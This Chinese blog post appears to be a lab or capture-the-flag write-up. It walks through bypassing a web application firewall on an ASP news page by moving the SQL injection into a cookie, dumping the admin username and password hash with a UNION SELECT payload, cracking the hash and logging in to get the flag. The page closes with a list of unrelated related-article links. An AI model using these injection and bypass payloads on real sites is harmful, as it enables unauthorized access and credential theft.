当前位置: 首页 > news >正文

第二章:遇到阻难!绕过WAF过滤!

初始页面:http://g8wepfcp.ia.aqlab.cn/
image
随机查看新闻动态,进入后的URL:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170
image
判断是否存在注入点:
http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170'
image
被拦截了。
尝试and 1=1也被拦截。
尝试order by,爆出字段为10。
尝试注释绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'/*(s13*/,被拦截了。
尝试内联绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171/*!40000'*/,被拦截了。
尝试双写绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'',被拦截了。
网页防护一般只拦截Get、post传参,尝试将测试语句放到cookie里面,再发送给服务器:
image
页面能正常显示,说明Cookie传参有效,被当作sql语句拼接了。
尝试通过Cookie注入:
cookie值:id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin【from admin的来源不清楚,相关资料直接给出,使用其他表的表名均会爆数据库错误】
image
爆出回显点有:2,3,7,8,9。
爆用户名和密码:admin/b9a2a2b5dffb918c
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
解码密码:b9a2a2b5dffb918c-->welcome【加密是MD5的16位截断】
进入后台http://g8wepfcp.ia.aqlab.cn/admin/【后台地址一般是在url后接/admin】
输入账号密码:admin/welcome。
image
登录成功后拿到Flag。
image

http://www.hn-smt.com/news/172804/

相关文章:

  • PyTorch-CUDA-v2.7镜像中绑定‘yolov11’目标检测新版本造势
  • postgresql存储过程如何写
  • PyTorch-CUDA-v2.7镜像中提供uptime监控页面展示服务状态
  • 开关电源-Buck电路关键设计参数
  • PyTorch-CUDA-v2.7镜像中实现个性化推荐提升用户粘性
  • PyTorch-CUDA-v2.7镜像中设置webhook触发自动化流程
  • PyTorch-CUDA-v2.7镜像中同步系统时间与时区配置
  • PyTorch-CUDA-v2.7镜像中微调Qwen模型的详细步骤
  • PyTorch-CUDA-v2.7镜像中使用Profiler分析性能瓶颈
  • Transformer模型训练新选择:PyTorch-CUDA-v2.7镜像实测体验
  • Conda与PyTorch冲突怎么办?改用PyTorch-CUDA-v2.7容器化解决方案
  • comsol增材制造选区激光熔化SLM的粉床数值模拟 l模型的建立都有讲解,以及后处理的操作...
  • [SO101]在Jetson AGX Thor 上训练和部署GROOT N1.5模型
  • 执行命令行程序测试自动化
  • SQL Server - Session settings in procedure
  • Travis CI已停用?转向GitHub Actions的新配置
  • C++ new/delete 极简笔记:动态内存管理核心用法
  • 2026年实体机器人全品类解析与应用现状 - 智造出海
  • PyTorch-CUDA-v2.7镜像企业授权许可说明:商业用途合规指引
  • PyTorch-CUDA-v2.7镜像大小是多少?磁盘空间规划建议
  • NeurIPS投稿配套代码规范:PyTorch-CUDA-v2.7环境打包
  • 专业技术支持服务购买:PyTorch-CUDA-v2.7故障应急响应
  • GPU算力代金券发放活动:新用户注册即送100小时使用时长
  • BLIP图像描述生成:PyTorch-CUDA-v2.7应用场景拓展
  • BART摘要生成实战:PyTorch-CUDA-v2.7端到端流程
  • 树莓派4B安装PyTorch有多难?不如选用专用边缘计算镜像
  • IP 地址与 MAC 地址基础知识总结
  • 基于 Docker 和 MCSManager 搭建 SteamCMD 游戏服务器
  • DiskInfo监控SSD寿命:保障GPU服务器长期稳定运行
  • CVPR竞赛获奖方案:基于PyTorch-CUDA-v2.7的创新架构